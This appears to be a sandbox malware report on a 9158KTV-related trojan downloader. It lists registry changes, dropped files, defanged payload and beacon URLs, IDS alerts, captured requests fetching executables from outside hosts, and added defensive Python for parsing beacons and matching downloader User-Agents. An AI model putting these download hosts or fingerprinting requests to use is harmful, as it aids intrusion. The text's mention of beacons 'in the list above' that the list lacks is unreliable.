[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\PPTAssist.Control\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"

[HKCU\Software\Classes\PPTAssist.Control.1]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\PPTAssist.Control\CurVer]
"(Default)" = "PPTAssist.Control.1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Programmable]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\Programmable]

The process regsvr32.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 7B 80 77 94 5C 96 B6 EE D3 E5 42 32 1B AB 6B"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

The process regsvr32.exe:1124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 47 31 82 39 D8 42 05 2E CC 33 5C 83 E4 5B 5E"

The process regsvr32.exe:2940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 39 52 96 CA 39 CA 61 B4 82 1A AA 2E 61 00 CF"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

The process 9158.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 30 4F 3C 5C 6B D3 D9 BF 8C B0 B5 F6 48 2F B4"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Control]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\Programmable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Programmable]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Insertable]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\Programmable]
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]

Dropped PE files

MD5 File path
23b3afde34b252b53e7c1b4a78cb9712 c:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027
ef8154cf33a6ac0dffc02f325acfb7de c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\dts.exe
91aeea640a17ed03dcfcde1b9096a86f c:\Documents and Settings\"%CurrentUserName%"\Application Data\dts\mydts\uninst.exe
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\Inetc.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\System.dll
05450face243b3a7472407b999b03a72 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsl40.tmp\nsProcess.dll
7b21f6e266e8a4188871804c9810d74a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe
d7a6bde253e3b614afc203d9ff406855 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe
23b3afde34b252b53e7c1b4a78cb9712 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe
7b21f6e266e8a4188871804c9810d74a c:\Program Files\MM-liao8398.exe
d7a6bde253e3b614afc203d9ff406855 c:\Program Files\yx_dts.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 525730 528384 5.16694 9669be3168afdeaa40ea92d045a9bf87
.rdata 532480 78292 81920 3.10013 59a4df56cb6817d94f6644cd1766027b
.data 614400 137384 73728 4.23409 638d29c6b937c71b888b0b82efddfb46
.rsrc 753664 22336 24576 3.3136 c674065dbbb8d9d754a7080269a63dd4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

hxxp://d.wanyouxi7.com/yx/dts/sqft/905848/app.ini 61.156.157.181
hxxp://img1.37wanimg.com/dts/css/client/game1/log.jpg 203.130.61.92
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 203.130.60.32
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 112.90.83.106
hxxp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484 203.130.61.92
down.cncpa.net 222.186.129.20
jh.01lm.com 171.107.186.80
pchome.b0.upaiyun.com 108.186.7.129
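The DownloadInsertinfo.aspx requests in the list above are the installer's install-telemetry beacon, and the query string carries a hardware and licence fingerprint of the host in the clear (the Windows product ID in KEY, the MAC address, a disk serial, CPU and graphics adapter) next to campaign bookkeeping (Lmarkid, Wmarkid, Mtype, status, flag). The Python below is an added example for this report, not code from the installer or from the 9158 service: it splits the two beacons copied from the list above into host fingerprint, empty probe fields and campaign fields, decodes the client-side tick timestamp, and reports which fields change between the status=1 and status=2 beacons. The field grouping is this example's own reading of the parameter names; the page does not document them.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Two beacons copied from the URL list above (scheme defanged as hxxp).
BEACON_STATUS_1 = (
    "hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)"
    "&Resolution=1024*768&OS=Microsoft Windows XP Professional"
    "&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B"
    "&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz"
    "&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19"
    "&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1"
    "&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9"
)
BEACON_STATUS_2 = BEACON_STATUS_1.replace(
    "tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1",
    "tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2",
)

# Parameters that describe the victim host rather than the campaign.
# This grouping is the example's own reading of the parameter names.
HOST_FIELDS = {"Browser", "Resolution", "OS", "KEY", "Mac", "HardDrive", "CPU", "Graphics"}
# Empty in this capture; the page does not say what they probe for.
PROBE_FIELDS = {"Safe", "QQ", "Sougou", "qqnumber"}


def parse_beacon(url: str) -> dict:
    """Return the beacon's query string as a flat name -> value dict.

    The capture carries raw spaces, '(' and '@' inside values; parse_qs
    passes them through, and keep_blank_values keeps the empty probes."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def split_fields(params: dict) -> dict:
    """Group the parameters into host fingerprint, probes and campaign data."""
    known = HOST_FIELDS | PROBE_FIELDS
    return {
        "host": {k: v for k, v in params.items() if k in HOST_FIELDS},
        "probes": {k: v for k, v in params.items() if k in PROBE_FIELDS},
        "campaign": {k: v for k, v in params.items() if k not in known},
    }


def tick_to_utc(tick: str) -> str:
    """'tick' is a Unix timestamp taken from the client clock, not the server's."""
    return datetime.fromtimestamp(int(tick), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def looks_like_md5(value: str) -> bool:
    """'flag' is 32 lowercase hex digits; the page does not say what is hashed."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def changed_fields(url_a: str, url_b: str) -> set:
    """Which parameters differ between two beacons from the same host."""
    a, b = parse_beacon(url_a), parse_beacon(url_b)
    return {k for k in a.keys() | b.keys() if a.get(k) != b.get(k)}


if __name__ == "__main__":
    groups = split_fields(parse_beacon(BEACON_STATUS_1))
    for name, fields in groups.items():
        print(name)
        for k, v in fields.items():
            print(f"  {k} = {v!r}")
    print("tick (UTC):", tick_to_utc(groups["campaign"]["tick"]))
    print("changed between status=1 and status=2:",
          sorted(changed_fields(BEACON_STATUS_1, BEACON_STATUS_2)))
```

Run stand-alone it prints the three groups; the only fields that move between the two beacons, five seconds apart, are tick, flag and status, so flag is per-beacon rather than a fixed host identifier.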


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
    seen on: GET /yx_dts.exe and GET /OfficeAssist.0419.80.1123.exe to idc.xn--r93a55o.cc and GET /RzuoiTP to t.cn, all sent with User-Agent: NSIS_Inetc (Mozilla)
ET DNS DNS Query for Suspicious .com.cn Domain
    seen on: int.dpool.sina.com.cn, the only .com.cn host in the capture
ET POLICY HTTP Request on Unusual Port Possibly Hostile
    the only non-standard port in the capture is down.cncpa.net:9000, the ErrorUrl in the downloader config served by tj.9158.com
ET POLICY NSISDL Iplookup.php IPCheck
    seen on: GET /iplookup/iplookup.php HTTP/1.0 to int.dpool.sina.com.cn with User-Agent: NSISDL/1.2 (Mozilla)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
    a byte-pattern signature; the report does not say which stream triggered it, and the executables downloaded in this capture are plausible sources of such a match, so treat it as unconfirmed
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
    both from GET /ktv/9158chat2_ktv083_98200205.exe to jh.01lm.com, sent with User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) from a host whose beacon reports Windows XP
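Four of the seven alerts key on User-Agent strings that appear verbatim in the captured requests further down this page: the NSIS Inetc and NSISDL plugin agents, the forged MSIE 5.00 / Windows 98 agent, and the bare DownloadInstall and HTTPDownloader agents that no browser sends. The Python below is an added example, not the Suricata rules themselves and not part of the report: a minimal HTTP request parser plus a User-Agent classifier run over sample requests constructed from those captures. The labels are this example's own, and the real ET rules also constrain the HTTP context (method, header position, direction) rather than matching the agent string alone.

```python
import re

# Label -> pattern. Labels are this example's own, not ET signature names.
UA_SIGNATURES = [
    ("nsis-inetc-plugin", re.compile(r"^NSIS_Inetc \(Mozilla\)$")),
    ("nsisdl-plugin",     re.compile(r"^NSISDL/[\d.]+ \(Mozilla\)$")),
    ("fake-win98-ie5",    re.compile(r"MSIE 5\.00; Windows 98")),
    ("bare-downloader",   re.compile(r"^(DownloadInstall|HTTPDownloader)$")),
]


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.x request parser: request line plus headers.

    Tolerates 'Name:value' with no space after the colon, as in the
    jh.01lm.com request on this page."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def classify_ua(user_agent: str) -> list:
    """All signature labels whose pattern matches the agent string."""
    return [label for label, rx in UA_SIGNATURES if rx.search(user_agent)]


def alerts_for(raw_request: str) -> dict:
    req = parse_request(raw_request)
    ua = req["headers"].get("user-agent", "")
    return {"host": req["headers"].get("host", ""), "path": req["path"],
            "ua": ua, "hits": classify_ua(ua)}


# Sample requests constructed from the captures on this page.
REQ_NSIS_INETC = """GET /yx_dts.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache
"""

REQ_NSISDL = """GET /iplookup/iplookup.php HTTP/1.0
Host: int.dpool.sina.com.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
"""

REQ_WIN98 = """GET /ktv/9158chat2_ktv083_98200205.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
"""

REQ_BROWSER = """GET /dts/css/client/game1.css?t=1419052484 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: img1.37wanimg.com
Connection: Keep-Alive
"""

if __name__ == "__main__":
    for raw in (REQ_NSIS_INETC, REQ_NSISDL, REQ_WIN98, REQ_BROWSER):
        a = alerts_for(raw)
        print(f"{a['host']}{a['path']}  ->  {a['hits'] or 'no alert'}")
```

The browser-looking MSIE 6.0 request from the embedded IE control produces no hit, which is the point: once the downloader has handed off to an IE-based game client, User-Agent alone no longer separates it from the user's own browsing, and the host and path indicators above have to carry the detection.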

Traffic

GET /Opendownloadernewxml.aspx?softlist=&lmarkid=83 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>
<config>
  <Title>..........9158ktv</Title>
  <XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>
  <AdvertUrl>hXXp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
  <DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>
  <ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>
  <Icon>hXXp://tj.9158.com/temp/downloaderico/main.ico</Icon>
  <IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>
  <Setuptime>20</Setuptime>
  <ToolIcon>9158........</ToolIcon>
  <Item>9158ktv</Item>
  <Mtype>19</Mtype>
  <ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>
  <check>
    <visible>1</visible>
    <choice>1</choice>
    <checkName>........</checkName>
    <downUrl></downUrl>
  </check>
  <check>
    <visible>1</visible>
    <choice>1</choice>
    <checkName>........</checkName>
    <downUrl></downUrl>
  </check>
</config>
(runs of dots stand for GB2312 text that the sandbox dump did not render)

<<< skipped >>>
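The XML above is the downloader's job description: where the payload lives (DownloadUrl plus the ProExe filename template), which hosts it will talk to, two pre-ticked optional-install checkboxes, and an ErrorUrl on a non-standard port. The Python below is an added example, not the downloader's own code: it parses a rebuilt copy of that config (the GB2312 text the sandbox dropped is omitted and every scheme is defanged as hXXp), fills the {0}/{1} placeholders the way .NET String.Format would, and lists the referenced hosts and non-standard ports. Filling the placeholders with 83 and 98200205 reproduces the /ktv/9158chat2_ktv083_98200205.exe download seen later in the capture; that 83 equals the lmarkid sent in the request for this config is an observation from this page, and 98200205 is simply the value observed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# The config as served by tj.9158.com, rebuilt from the dump above. The GB2312
# text the sandbox dropped is omitted, and every scheme is defanged as hXXp.
CONFIG_XML = """<?xml version="1.0" encoding="GB2312"?>
<config>
  <Title>9158ktv</Title>
  <XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>
  <AdvertUrl>hXXp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>
  <DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>
  <ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>
  <Icon>hXXp://tj.9158.com/temp/downloaderico/main.ico</Icon>
  <IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>
  <Setuptime>20</Setuptime>
  <ToolIcon>9158</ToolIcon>
  <Item>9158ktv</Item>
  <Mtype>19</Mtype>
  <ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>
  <check><visible>1</visible><choice>1</choice><checkName></checkName><downUrl></downUrl></check>
  <check><visible>1</visible><choice>1</choice><checkName></checkName><downUrl></downUrl></check>
</config>
"""


def load_config(text: str):
    """Parse the config. The declaration names GB2312, which expat cannot
    decode from a str, so it is dropped: the dump is ASCII-only anyway."""
    if text.lstrip().startswith("<?xml"):
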